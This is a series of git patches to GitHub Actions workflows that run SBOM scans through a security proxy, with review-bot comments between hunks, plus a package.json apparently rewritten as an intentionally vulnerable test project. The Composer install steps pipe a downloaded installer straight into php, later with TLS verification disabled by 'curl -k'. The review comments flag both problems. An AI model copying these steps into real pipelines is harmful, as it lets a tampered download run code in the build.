'${{env.API_URL}}/utilityapi/v1/registry?api_key=${{secrets.VB_API_KEY}}' - method: 'GET' + url: '${{ env.API_URL }}/utilityapi/v1/registry?api_key=${{ secrets.VB_API_KEY }}' + method: 'GET' - name: Decoding VB Token id: parseToken run: echo "DECODED_TOKEN=$(echo ${{ fromJson(steps.fetchECRDetails.outputs.response).data }} | base64 -d)" >> "$GITHUB_OUTPUT" - name: ECR Details id: ecr_details run: | - echo "username=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).username}}" >> "$GITHUB_OUTPUT" - echo "token=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).password}}" >> "$GITHUB_OUTPUT" - echo "region=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).region}}" >> "$GITHUB_OUTPUT" - echo "registry_id=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).registry_id}}" >> "$GITHUB_OUTPUT" - + echo "username=${{ 
fromJSON(steps.parseToken.outputs.DECODED_TOKEN).username }}" >> "$GITHUB_OUTPUT" + echo "token=${{ fromJSON(steps.parseToken.outputs.DECODED_TOKEN).password }}" >> "$GITHUB_OUTPUT" + echo "region=${{ fromJSON(steps.parseToken.outputs.DECODED_TOKEN).region }}" >> "$GITHUB_OUTPUT" + echo "registry_id=${{ fromJSON(steps.parseToken.outputs.DECODED_TOKEN).registry_id }}" >> "$GITHUB_OUTPUT" + start_proxy_and_build: runs-on: ubuntu-latest needs: [create_scan_in_IR_Portal, ecr_details] 
@@ -57,34 +58,36 @@ jobs: pse: image: 282904853176.dkr.ecr.us-west-2.amazonaws.com/invisirisk/pse-proxy:dev-test credentials: - username: ${{needs.ecr_details.outputs.ecr_username}} - password: ${{needs.ecr_details.outputs.ecr_token}} + username: ${{ needs.ecr_details.outputs.ecr_username }} + password: ${{ needs.ecr_details.outputs.ecr_token }} env: PSE_DEBUG_FLAG: --alsologtostderr POLICY_LOG: t - INVISIRISK_JWT_TOKEN: ${{secrets.VB_API_KEY}} - INVISIRISK_PORTAL: https://app.stage.veribom.com + INVISIRISK_JWT_TOKEN: ${{ secrets.VB_API_KEY }} + INVISIRISK_PORTAL: https://app.stage.veribom.com GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} container: - image: node:18-alpine + image: php:8.2 options: --cap-add=NET_ADMIN strategy: matrix: - node-version: [18.x] + php-version: [8.2] steps: - - env: - SCAN_ID: ${{ needs.create_scan_in_IR_Portal.outputs.scan_id }} - run: echo $SCAN_ID - - uses: invisirisk/pse-action@v1.0.8 - with: + - env: + SCAN_ID: ${{ needs.create_scan_in_IR_Portal.outputs.scan_id }} + run: echo $SCAN_ID + - uses: invisirisk/pse-action@v1.0.8 + with: github-token: ${{ secrets.GITHUB_TOKEN }} SCAN_ID: ${{ needs.create_scan_in_IR_Portal.outputs.scan_id }} - - name: Checkout the code - uses: actions/checkout@v3 - - name: Use Node.js ${{ matrix.node-version }} - uses: actions/setup-node@v3 - with: - node-version: ${{ matrix.node-version }} - - - run: npm install -g pnpm - - run: pnpm install + + - name: Checkout the code + uses: actions/checkout@v3 + + - name: Install Composer + run: | + curl -sS https://getcomposer.org/installer | php + sudo mv composer.phar /usr/local/bin/composer + + - name: Install PHP Dependencies + run: composer install From 694ba5d015c2180660a62e5314e9fe995afdaf01 Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Tue, 4 Mar 2025 14:06:49 +0545 Subject: [PATCH 41/89] Update mainphp.yml --- .github/workflows/mainphp.yml | 92 +++++++++++++++++++++++++++++++++++ 1 file changed, 92 insertions(+) 
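Review bot: The new `Install Composer` step pipes `https://getcomposer.org/installer` straight into `php` without checking it, so whatever that URL returns is executed in the job. Download the installer to a file, compare its SHA-384 with the signature Composer publishes at `https://composer.github.io/installer.sig`, and run it only when the two match. The sketch below does that and also drops `sudo`, which the `php:8.2` container image is unlikely to provide. The same step is added again in the `mainphp.yml` hunk of PATCH 41.

```yaml
      - name: Install Composer
        run: |
          expected="$(curl -fsS https://composer.github.io/installer.sig)"
          curl -fsS -o composer-setup.php https://getcomposer.org/installer
          actual="$(php -r "echo hash_file('sha384', 'composer-setup.php');")"
          if [ "$expected" != "$actual" ]; then
            echo "Composer installer checksum mismatch" >&2
            rm -f composer-setup.php
            exit 1
          fi
          php composer-setup.php --install-dir=/usr/local/bin --filename=composer
          rm -f composer-setup.php
      # … unchanged: Install PHP Dependencies step …
```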
diff --git a/.github/workflows/mainphp.yml b/.github/workflows/mainphp.yml index 8b13789..31e135a 100644 --- a/.github/workflows/mainphp.yml +++ b/.github/workflows/mainphp.yml 
@@ -1 +1,93 @@ +name: Build PHP Package +on: + workflow_dispatch: +permissions: + checks: write + contents: read + packages: read +env: + API_URL: https://app.stage.veribom.com + +jobs: + create_scan_in_IR_Portal: + runs-on: ubuntu-latest + outputs: + scan_id: ${{ steps.parseResponse.outputs.scan_id }} + steps: + - name: Initiating SBOM Scan + id: createScan + uses: fjogeleit/http-request-action@v1.15.1 + with: + url: '${{ env.API_URL }}/utilityapi/v1/scan' + method: 'POST' + data: '{"api_key": "${{ secrets.VB_API_KEY }}"}' + - name: Parse Response + id: parseResponse + run: echo "scan_id=${{ fromJSON(steps.createScan.outputs.response).data.scan_id }}" >> "$GITHUB_OUTPUT" + + ecr_details: + runs-on: ubuntu-latest + outputs: + ecr_username: ${{ steps.ecr_details.outputs.username }} + ecr_token: ${{ steps.ecr_details.outputs.token }} + ecr_region: ${{ steps.ecr_details.outputs.region }} + ecr_id: ${{ steps.ecr_details.outputs.registry_id }} + steps: + - name: Fetching VB Token + id: fetchECRDetails + uses: fjogeleit/http-request-action@v1.15.1 + with: + url: '${{ env.API_URL }}/utilityapi/v1/registry?api_key=${{ secrets.VB_API_KEY }}' + method: 'GET' + - name: Decoding VB Token + id: parseToken + run: echo "DECODED_TOKEN=$(echo ${{ fromJson(steps.fetchECRDetails.outputs.response).data }} | base64 -d)" >> "$GITHUB_OUTPUT" + - name: ECR Details + id: ecr_details + run: | + echo "username=${{ fromJSON(steps.parseToken.outputs.DECODED_TOKEN).username }}" >> "$GITHUB_OUTPUT" + echo "token=${{ fromJSON(steps.parseToken.outputs.DECODED_TOKEN).password }}" >> "$GITHUB_OUTPUT" + echo "region=${{ fromJSON(steps.parseToken.outputs.DECODED_TOKEN).region }}" >> "$GITHUB_OUTPUT" + echo "registry_id=${{ fromJSON(steps.parseToken.outputs.DECODED_TOKEN).registry_id }}" >> "$GITHUB_OUTPUT" + + start_proxy_and_build: + runs-on: ubuntu-latest + needs: [create_scan_in_IR_Portal, ecr_details] + services: + pse: + image: 
282904853176.dkr.ecr.us-west-2.amazonaws.com/invisirisk/pse-proxy:dev-test + credentials: + username: ${{ needs.ecr_details.outputs.ecr_username }} + password: ${{ needs.ecr_details.outputs.ecr_token }} + env: + PSE_DEBUG_FLAG: --alsologtostderr + POLICY_LOG: t + INVISIRISK_JWT_TOKEN: ${{ secrets.VB_API_KEY }} + INVISIRISK_PORTAL: https://app.stage.veribom.com + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + container: + image: php:8.2 + options: --cap-add=NET_ADMIN + strategy: + matrix: + php-version: [8.2] + steps: + - env: + SCAN_ID: ${{ needs.create_scan_in_IR_Portal.outputs.scan_id }} + run: echo $SCAN_ID + - uses: invisirisk/pse-action@v1.0.8 + with: + github-token: ${{ secrets.GITHUB_TOKEN }} + SCAN_ID: ${{ needs.create_scan_in_IR_Portal.outputs.scan_id }} + + - name: Checkout the code + uses: actions/checkout@v3 + + - name: Install Composer + run: | + curl -sS https://getcomposer.org/installer | php + sudo mv composer.phar /usr/local/bin/composer + + - name: Install PHP Dependencies + run: composer install From a386a7ad00dc79585e32bbb865a342963fb6ea7f Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Tue, 4 Mar 2025 14:08:06 +0545 Subject: [PATCH 42/89] Update main.yml --- .github/workflows/main.yml | 75 ++++++++++++++++++-------------------- 1 file changed, 36 insertions(+), 39 deletions(-) diff --git a/.github/workflows/main.yml b/.github/workflows/main.yml index 31e135a..0635c62 100644 --- a/.github/workflows/main.yml +++ b/.github/workflows/main.yml @@ -1,6 +1,6 @@ -name: Build PHP Package +name: Build NPM Package on: - workflow_dispatch: + workflow_dispatch: permissions: checks: write 
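Review bot: This new file is byte-identical to the `main.yml` committed in PATCH 40 (both blobs are `31e135a`), including the `create_scan_in_IR_Portal` and `ecr_details` jobs that handle `VB_API_KEY` and the registry credential, so every later fix to that handling has to be made in two places. Consider moving those two jobs into a reusable workflow (`on: workflow_call`) that both files call. Separately, the `php-version` matrix is declared but no step reads `matrix.php-version`; either use it or remove the `strategy` block.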
@@ -19,38 +19,37 @@ jobs: id: createScan uses: fjogeleit/http-request-action@v1.15.1 with: - url: '${{ env.API_URL }}/utilityapi/v1/scan' + url: '${{env.API_URL}}/utilityapi/v1/scan' method: 'POST' - data: '{"api_key": "${{ secrets.VB_API_KEY }}"}' + data: '{"api_key": "${{secrets.VB_API_KEY}}"}' - name: Parse Response id: parseResponse - run: echo "scan_id=${{ fromJSON(steps.createScan.outputs.response).data.scan_id }}" >> "$GITHUB_OUTPUT" - + run: echo "scan_id=${{fromJSON(steps.createScan.outputs.response).data.scan_id}}" >> "$GITHUB_OUTPUT" ecr_details: runs-on: ubuntu-latest outputs: - ecr_username: ${{ steps.ecr_details.outputs.username }} - ecr_token: ${{ steps.ecr_details.outputs.token }} - ecr_region: ${{ steps.ecr_details.outputs.region }} - ecr_id: ${{ steps.ecr_details.outputs.registry_id }} + ecr_username: ${{steps.ecr_details.outputs.username}} + ecr_token: ${{steps.ecr_details.outputs.token}} + ecr_region: ${{steps.ecr_details.outputs.region}} + ecr_id: ${{steps.ecr_details.outputs.registry_id}} steps: - name: Fetching VB Token id: fetchECRDetails uses: fjogeleit/http-request-action@v1.15.1 with: - url: '${{ env.API_URL }}/utilityapi/v1/registry?api_key=${{ secrets.VB_API_KEY }}' - method: 'GET' + url: '${{env.API_URL}}/utilityapi/v1/registry?api_key=${{secrets.VB_API_KEY}}' + method: 'GET' - name: Decoding VB Token id: parseToken run: echo "DECODED_TOKEN=$(echo ${{ fromJson(steps.fetchECRDetails.outputs.response).data }} | base64 -d)" >> "$GITHUB_OUTPUT" - name: ECR Details id: ecr_details run: | - echo "username=${{ fromJSON(steps.parseToken.outputs.DECODED_TOKEN).username }}" >> "$GITHUB_OUTPUT" - echo "token=${{ fromJSON(steps.parseToken.outputs.DECODED_TOKEN).password }}" >> "$GITHUB_OUTPUT" - echo "region=${{ fromJSON(steps.parseToken.outputs.DECODED_TOKEN).region }}" >> "$GITHUB_OUTPUT" - echo "registry_id=${{ fromJSON(steps.parseToken.outputs.DECODED_TOKEN).registry_id }}" >> "$GITHUB_OUTPUT" - + echo 
"username=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).username}}" >> "$GITHUB_OUTPUT" + echo "token=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).password}}" >> "$GITHUB_OUTPUT" + echo "region=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).region}}" >> "$GITHUB_OUTPUT" + echo "registry_id=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).registry_id}}" >> "$GITHUB_OUTPUT" + start_proxy_and_build: runs-on: ubuntu-latest needs: [create_scan_in_IR_Portal, ecr_details] 
@@ -58,36 +57,34 @@ jobs: pse: image: 282904853176.dkr.ecr.us-west-2.amazonaws.com/invisirisk/pse-proxy:dev-test credentials: - username: ${{ needs.ecr_details.outputs.ecr_username }} - password: ${{ needs.ecr_details.outputs.ecr_token }} + username: ${{needs.ecr_details.outputs.ecr_username}} + password: ${{needs.ecr_details.outputs.ecr_token}} env: PSE_DEBUG_FLAG: --alsologtostderr POLICY_LOG: t - INVISIRISK_JWT_TOKEN: ${{ secrets.VB_API_KEY }} - INVISIRISK_PORTAL: https://app.stage.veribom.com + INVISIRISK_JWT_TOKEN: ${{secrets.VB_API_KEY}} + INVISIRISK_PORTAL: https://app.stage.veribom.com GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} container: - image: php:8.2 + image: node:18-alpine options: --cap-add=NET_ADMIN strategy: matrix: - php-version: [8.2] + node-version: [18.x] steps: - - env: - SCAN_ID: ${{ needs.create_scan_in_IR_Portal.outputs.scan_id }} - run: echo $SCAN_ID - - uses: invisirisk/pse-action@v1.0.8 - with: + - env: + SCAN_ID: ${{ needs.create_scan_in_IR_Portal.outputs.scan_id }} + run: echo $SCAN_ID + - uses: invisirisk/pse-action@v1.0.8 + with: github-token: ${{ secrets.GITHUB_TOKEN }} SCAN_ID: ${{ needs.create_scan_in_IR_Portal.outputs.scan_id }} - - - name: Checkout the code - uses: actions/checkout@v3 - - - name: Install Composer - run: | - curl -sS https://getcomposer.org/installer | php - sudo mv composer.phar /usr/local/bin/composer - - - name: Install PHP Dependencies - run: composer install + - name: Checkout the code + uses: actions/checkout@v3 + - name: Use Node.js ${{ matrix.node-version }} + uses: actions/setup-node@v3 + with: + node-version: ${{ matrix.node-version }} + + - run: npm install -g pnpm + - run: pnpm install From da7e515cba50dbcdd7d8eabd2f56fdb3f129792c Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Tue, 4 Mar 2025 14:19:38 +0545 Subject: [PATCH 43/89] Update mainphp.yml --- .github/workflows/mainphp.yml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) 
diff --git a/.github/workflows/mainphp.yml b/.github/workflows/mainphp.yml index 31e135a..533ba1b 100644 --- a/.github/workflows/mainphp.yml +++ b/.github/workflows/mainphp.yml @@ -86,8 +86,10 @@ jobs: - name: Install Composer run: | - curl -sS https://getcomposer.org/installer | php - sudo mv composer.phar /usr/local/bin/composer + apt-get update && apt-get install -y curl php-cli unzip + curl -k -sS https://getcomposer.org/installer | php + mv composer.phar /usr/local/bin/composer + - name: Install PHP Dependencies run: composer install From b94bc637d57de3dafd30ccc24bf5eeb38f0702f7 Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Tue, 4 Mar 2025 14:29:40 +0545 Subject: [PATCH 44/89] Update mainphp.yml --- .github/workflows/mainphp.yml | 9 ++++++--- 1 file changed, 6 insertions(+), 3 deletions(-) diff --git a/.github/workflows/mainphp.yml b/.github/workflows/mainphp.yml index 533ba1b..1446b54 100644 --- a/.github/workflows/mainphp.yml +++ b/.github/workflows/mainphp.yml @@ -86,9 +86,12 @@ jobs: - name: Install Composer run: | - apt-get update && apt-get install -y curl php-cli unzip - curl -k -sS https://getcomposer.org/installer | php - mv composer.phar /usr/local/bin/composer + apt-get update + apt-get install -y curl unzip + apt-get install -y php8.2-cli || apt-get install -y php-cli + curl -k -sS https://getcomposer.org/installer | php + mv composer.phar /usr/local/bin/composer + - name: Install PHP Dependencies From 0c66de30cd58a60ee8f71e9bcece900dbd0c4041 Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Wed, 5 Mar 2025 10:27:37 +0545 Subject: [PATCH 45/89] Update composer.json --- composer.json | 112 +------------------------------------------------- 1 file changed, 1 insertion(+), 111 deletions(-) diff --git a/composer.json b/composer.json index 7868e26..8b13789 100644 --- a/composer.json +++ b/composer.json 
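Review bot: `curl -k` in the `Install Composer` step turns off TLS certificate verification for the installer download, and the result is piped directly into `php`, so the job executes whatever the other end of an unverified connection returns. Drop the flag: `curl -fsS https://getcomposer.org/installer`. If it was added because the build's traffic passes through the intercepting `pse` proxy (my guess; the diff does not say), the remedy is to trust that proxy's CA certificate inside the container rather than to disable verification. The flag is carried over unchanged in the next commit's hunk.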
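Review bot: `apt-get install -y php8.2-cli || apt-get install -y php-cli` tries to add a distribution PHP to a job that, as far as the rest of this workflow shows, already runs in `container: image: php:8.2`. If it succeeds, which `php` binary runs the installer and `composer install` depends on `PATH` order, and the `||` fallback hides why the first attempt failed. The line can probably be removed, leaving `apt-get install -y --no-install-recommends curl unzip`; confirm against the image actually in use.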
@@ -1,111 +1 @@ -{ - "require": { - "monolog/monolog": "^2.0", - "guzzlehttp/guzzle": "^7.0", - "symfony/symfony": "^6.0", - "laravel/framework": "^10.0", - "phpunit/phpunit": "^9.0", - "doctrine/orm": "^2.0", - "fzaninotto/faker": "^1.9", - "vlucas/phpdotenv": "^5.0", - "swiftmailer/swiftmailer": "^6.0", - "twig/twig": "^3.0", - "psr/log": "^1.0", - "sebastian/version": "^3.0", - "sebastian/global-state": "^5.0", - "sebastian/exporter": "^4.0", - "sebastian/environment": "^5.0", - "sebastian/diff": "^4.0", - "sebastian/comparator": "^4.0", - "phpdocumentor/reflection-common": "^2.0", - "phpdocumentor/type-resolver": "^1.0", - "phpdocumentor/reflection-docblock": "^5.0", - "webmozart/assert": "^1.0", - "phpoption/phpoption": "^1.0", - "nikic/php-parser": "^4.0", - "mockery/mockery": "^1.0", - "hamcrest/hamcrest-php": "^2.0", - "dnoegel/php-xdg-base-dir": "^0.1", - "composer/semver": "^3.0", - "composer/installers": "^2.0", - "composer/ca-bundle": "^2.0", - "composer/composer": "^2.0", - "classpreloader/classpreloader": "^4.0", - "brianium/paratest": "^6.0", - "brick/math": "^0.9", - "aws/aws-sdk-php": "^3.0", - "asm89/stack-cors": "^2.0", - "ramsey/uuid": "^4.0", - "ralouphie/getallheaders": "^3.0", - "psy/psysh": "^0.10", - "phpseclib/phpseclib": "^3.0", - "phpspec/prophecy": "^1.0", - "phar-io/version": "^3.0", - "phar-io/manifest": "^2.0", - "paragonie/random_compat": "^9.0", - "myclabs/deep-copy": "^1.0", - "league/mime-type-detection": "^1.0", - "league/flysystem": "^3.0", - "league/commonmark": "^2.0", - "lcobucci/jwt": "^4.0", - "laravel/tinker": "^2.0", - "symfony/http-foundation": "^6.0", - "symfony/console": "^6.0", - "symfony/routing": "^6.0", - "symfony/event-dispatcher": "^6.0", - "symfony/http-kernel": "^6.0", - "symfony/finder": "^6.0", - "symfony/filesystem": "^6.0", - "symfony/process": "^6.0", - "symfony/var-dumper": "^6.0", - "symfony/translation": "^6.0", - "symfony/validator": "^6.0", - "symfony/serializer": "^6.0", - "symfony/yaml": "^6.0", - 
"symfony/security-core": "^6.0", - "symfony/security-http": "^6.0", - "symfony/security-csrf": "^6.0", - "symfony/security-guard": "^6.0", - "symfony/security-bundle": "^6.0", - "symfony/monolog-bridge": "^6.0", - "symfony/twig-bridge": "^6.0", - "symfony/twig-bundle": "^6.0", - "symfony/asset": "^6.0", - "symfony/expression-language": "^6.0", - "symfony/cache": "^6.0", - "symfony/lock": "^6.0", - "symfony/messenger": "^6.0", - "symfony/mailer": "^6.0", - "symfony/mercure": "^6.0", - "symfony/web-link": "^6.0", - "symfony/dom-crawler": "^6.0", - "symfony/browser-kit": "^6.0", - "symfony/css-selector": "^6.0", - "symfony/phpunit-bridge": "^6.0", - "symfony/panther": "^2.0", - "symfony/string": "^6.0", - "symfony/uid": "^6.0", - "symfony/rate-limiter": "^6.0", - "symfony/scheduler": "^6.0", - "symfony/remote-event": "^6.0", - "symfony/webhook": "^6.0", - "symfony/notifier": "^6.0", - "symfony/password-hasher": "^6.0", - "symfony/clock": "^6.0", - "symfony/doctrine-bridge": "^6.0", - "symfony/doctrine-messenger": "^6.0", - "symfony/orm-pack": "^2.0", - "symfony/webpack-encore-bundle": "^1.0", - "symfony/ux": "^2.0", - "symfony/ux-turbo": "^2.0", - "symfony/ux-twig-component": "^2.0", - "symfony/ux-live-component": "^2.0", - "symfony/ux-dropzone": "^2.0", - "symfony/ux-chartjs": "^2.0", - "symfony/ux-cropperjs": "^2.0", - "symfony/ux-lazy-image": "^2.0", - "symfony/ux-notify": "^2.0", - "symfony/ux-toggle-password": "^2.0", - "symfony/ux-autocomplete": "^2.0" - } -} + From 62cddf38fd62fd62882ec387bd9cfab765e8c7b2 Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Fri, 28 Mar 2025 11:11:22 +0545 Subject: [PATCH 46/89] Update package.json --- package.json | 556 +++++---------------------------------------------- 1 file changed, 53 insertions(+), 503 deletions(-) diff --git a/package.json b/package.json index 51b8d3b..c468407 100644 --- a/package.json +++ b/package.json 
@@ -1,512 +1,62 @@ { - "name": "top500-npm", + "name": "vulnerable-project", "version": "1.0.0", + "description": "A project with intentionally vulnerable dependencies.", "main": "index.js", "scripts": { + "start": "node index.js", "test": "echo \"Error: no test specified\" && exit 1" }, - "author": "", - "license": "ISC", - "description": "", "dependencies": { - "@angular/animations": "^19.2.0", - "@angular/cdk": "^19.2.1", - "@angular/common": "^19.2.0", - "@angular/compiler": "^19.2.0", - "@angular/core": "^19.2.0", - "@angular/forms": "^19.2.0", - "@angular/material": "^19.2.1", - "@angular/platform-browser": "^19.2.0", - "@angular/platform-browser-dynamic": "^19.2.0", - "@angular/router": "^19.2.0", - "@apollo/client": "^3.13.1", - "@aws-sdk/client-s3": "^3.758.0", - "@babel/code-frame": "^7.26.2", - "@babel/core": "^7.26.9", - "@babel/generator": "^7.26.9", - "@babel/helper-function-name": "^7.24.7", - "@babel/helper-module-imports": "^7.25.9", - "@babel/helper-module-transforms": "^7.26.0", - "@babel/helper-plugin-utils": "^7.26.5", - "@babel/helper-simple-access": "^7.25.9", - "@babel/helper-split-export-declaration": "^7.24.7", - "@babel/helpers": "^7.26.9", - "@babel/highlight": "^7.25.9", - "@babel/parser": "^7.26.9", - "@babel/preset-env": "^7.26.9", - "@babel/preset-typescript": "^7.26.0", - "@babel/runtime": "^7.26.9", - "@babel/template": "^7.26.9", - "@babel/types": "^7.26.9", - "@cubejs-client/core": "^1.0.10", - "@cubejs-client/react": "^1.0.10", - "@emotion/react": "^11.14.0", - "@emotion/styled": "^11.14.0", - "@heroku-cli/color": "^2.0.4", - "@heroku-cli/command": "^11.5.0", - "@heroku-cli/plugin-ps": "^8.1.7", - "@heroku-cli/plugin-ps-exec": "^2.6.2", - "@heroku-cli/plugin-run": "^8.1.4", - "@jridgewell/gen-mapping": "^0.3.8", - "@jridgewell/trace-mapping": "^0.3.25", - "@jupyterlab/application": "^4.3.5", - "@jupyterlab/application-extension": "^4.3.5", - "@jupyterlab/apputils-extension": "^4.3.5", - "@jupyterlab/cell-toolbar-extension": 
"^4.3.5", - "@jupyterlab/celltags-extension": "^4.3.5", - "@jupyterlab/codemirror-extension": "^4.3.5", - "@jupyterlab/completer-extension": "^4.3.5", - "@jupyterlab/console-extension": "^4.3.5", - "@jupyterlab/coreutils": "^6.3.5", - "@jupyterlab/csvviewer-extension": "^4.3.5", - "@jupyterlab/debugger-extension": "^4.3.5", - "@jupyterlab/docmanager-extension": "^4.3.5", - "@jupyterlab/docprovider-extension": "^3.6.8", - "@jupyterlab/documentsearch-extension": "^4.3.5", - "@jupyterlab/extensionmanager-extension": "^4.3.5", - "@jupyterlab/filebrowser-extension": "^4.3.5", - "@jupyterlab/fileeditor-extension": "^4.3.5", - "@jupyterlab/help-extension": "^4.3.5", - "@jupyterlab/htmlviewer-extension": "^4.3.5", - "@jupyterlab/hub-extension": "^4.3.5", - "@jupyterlab/imageviewer-extension": "^4.3.5", - "@jupyterlab/inspector-extension": "^4.3.5", - "@jupyterlab/javascript-extension": "^4.3.5", - "@jupyterlab/json-extension": "^4.3.5", - "@jupyterlab/launcher-extension": "^4.3.5", - "@jupyterlab/logconsole-extension": "^4.3.5", - "@jupyterlab/mainmenu-extension": "^4.3.5", - "@jupyterlab/markdownviewer-extension": "^4.3.5", - "@jupyterlab/mathjax2-extension": "^4.0.0", - "@jupyterlab/notebook-extension": "^4.3.5", - "@jupyterlab/pdf-extension": "^4.3.5", - "@jupyterlab/rendermime-extension": "^4.3.5", - "@jupyterlab/running-extension": "^4.3.5", - "@jupyterlab/settingeditor-extension": "^4.3.5", - "@jupyterlab/shortcuts-extension": "^5.1.5", - "@jupyterlab/statusbar-extension": "^4.3.5", - "@jupyterlab/terminal-extension": "^4.3.5", - "@jupyterlab/theme-dark-extension": "^4.3.5", - "@jupyterlab/theme-light-extension": "^4.3.5", - "@jupyterlab/toc-extension": "^6.3.5", - "@jupyterlab/tooltip-extension": "^4.3.5", - "@jupyterlab/translation-extension": "^4.3.5", - "@jupyterlab/ui-components-extension": "^4.3.5", - "@jupyterlab/vdom-extension": "^3.6.8", - "@jupyterlab/vega5-extension": "^4.3.5", - "@material-ui/core": "^4.12.4", - "@material-ui/icons": "^4.11.3", - 
"@mui/icons-material": "^6.4.6", - "@mui/material": "^6.4.6", - "@nestjs/common": "^11.0.11", - "@nestjs/core": "^11.0.11", - "@nestjs/platform-express": "^11.0.11", - "@oclif/command": "^1.8.36", - "@oclif/config": "^1.18.17", - "@oclif/plugin-commands": "^4.1.21", - "@oclif/plugin-help": "^6.2.26", - "@oclif/plugin-legacy": "^2.0.22", - "@oclif/plugin-not-found": "^3.2.44", - "@oclif/plugin-plugins": "^5.4.34", - "@oclif/plugin-update": "^4.6.33", - "@oclif/plugin-warn-if-update-available": "^3.1.35", - "@oclif/plugin-which": "^3.2.32", - "@reduxjs/toolkit": "^2.6.0", - "@salesforce-ux/design-system": "^2.26.2", - "@salesforce-ux/icons": "^10.12.1", - "@salesforce/design-system-react": "^0.10.63", - "@sentry/integrations": "^7.114.0", - "@sentry/node": "^9.3.0", - "@sentry/react": "^9.3.0", - "@sentry/tracing": "^7.120.3", - "@susy-js/lodash.merge": "^4.6.6", - "@swc/core": "^1.11.5", - "@testing-library/jest-dom": "^6.6.3", - "@testing-library/react": "^16.2.0", - "@testing-library/user-event": "^14.6.1", - "@types/express": "^5.0.0", - "@types/jest": "^29.5.14", - "@types/lodash": "^4.17.16", - "@types/node": "^22.13.8", - "@types/react": "^19.0.10", - "@types/react-dom": "^19.0.4", - "@types/uuid": "^10.0.0", - "@types/yargs": "^17.0.33", - "@typescript-eslint/eslint-plugin": "^8.25.0", - "@typescript-eslint/parser": "^8.25.0", - "accepts": "^1.3.8", - "acorn": "^8.14.0", - "agent-base": "^7.1.3", - "ajv": "^8.17.1", - "ansi-escapes": "^7.0.0", - "ansi-regex": "^6.1.0", - "ansi-styles": "^6.2.1", - "anymatch": "^3.1.3", - "argparse": "^2.0.1", - "array-flatten": "^3.0.0", - "array-union": "^3.0.1", - "async": "^3.2.6", - "autoprefixer": "^10.4.20", - "aws-cdk-lib": "^2.181.1", - "aws-sdk": "^2.1692.0", - "axios": "^1.8.1", - "babel-loader": "^10.0.0", - "babel-polyfill": "^6.26.0", - "balanced-match": "^3.0.1", - "bcrypt-nodejs": "^0.0.3", - "binary-extensions": "^3.0.0", - "bluebird": "^3.7.2", - "body-parser": "^1.20.3", - "bootstrap": "^5.3.3", - 
"brace-expansion": "^4.0.0", - "braces": "^3.0.3", - "browserslist": "^4.24.4", - "buffer": "^6.0.3", - "buffer-from": "^1.1.2", - "bytes": "^3.1.2", - "call-bind": "^1.0.8", - "callsites": "^4.2.0", - "camelcase": "^8.0.0", - "chai": "^5.2.0", - "chai-as-promised": "^8.0.1", - "chalk": "^5.4.1", - "chart.js": "^4.4.8", - "child-process-promise": "^2.2.1", - "chownr": "^3.0.0", - "ci-info": "^4.1.0", - "classnames": "^2.5.1", - "cli-progress-bar": "^1.0.1", - "cliui": "^8.0.1", - "color-convert": "^3.0.1", - "color-name": "^2.0.0", - "combined-stream": "^1.0.8", - "commander": "^13.1.0", - "compression": "^1.8.0", - "concat-map": "^0.0.2", - "config": "^3.3.12", - "constructs": "^10.4.2", - "content-type": "^1.0.5", - "convert-source-map": "^2.0.0", - "cookie": "^1.0.2", - "cookie-parser": "^1.4.7", - "core-js": "^3.41.0", - "core-util-is": "^1.0.3", - "cors": "^2.8.5", - "cross-env": "^7.0.3", - "cross-spawn": "^7.0.6", - "crypto-js": "^4.2.0", - "css-loader": "^7.1.2", - "csurf": "^1.11.0", - "cypress": "^14.1.0", - "d3": "^7.9.0", - "d3-flame-graph": "^4.1.3", - "d3-selection": "^3.0.0", - "dagre-d3": "^0.6.4", - "date-fns": "^4.1.0", - "dayjs": "^1.11.13", - "dd-trace": "^5.40.0", - "debug": "^4.4.0", - "deep-is": "^0.1.4", - "define-properties": "^1.2.1", - "define-property": "^2.0.2", - "delayed-stream": "^1.0.0", - "depd": "^2.0.0", - "dependable": "^1.1.0", - "destroy": "^1.2.0", - "doctrine": "^3.0.0", - "domelementtype": "^2.3.0", - "dompurify": "^3.2.4", - "dont-sniff-mimetype": "^1.1.0", - "dotenv": "^16.4.7", - "ejs": "^3.1.10", - "electron-to-chromium": "^1.5.109", - "emoji-regex": "^10.4.0", - "end-of-stream": "^1.4.4", - "enhanced-resolve": "^5.18.1", - "entities": "^6.0.0", - "error-ex": "^1.3.2", - "es-abstract": "^1.23.9", - "escape-string-regexp": "^5.0.0", - "eslint": "^9.21.0", - "eslint-config-prettier": "^10.0.2", - "eslint-plugin-import": "^2.31.0", - "eslint-plugin-jsx-a11y": "^6.10.2", - "eslint-plugin-prettier": "^5.2.3", - 
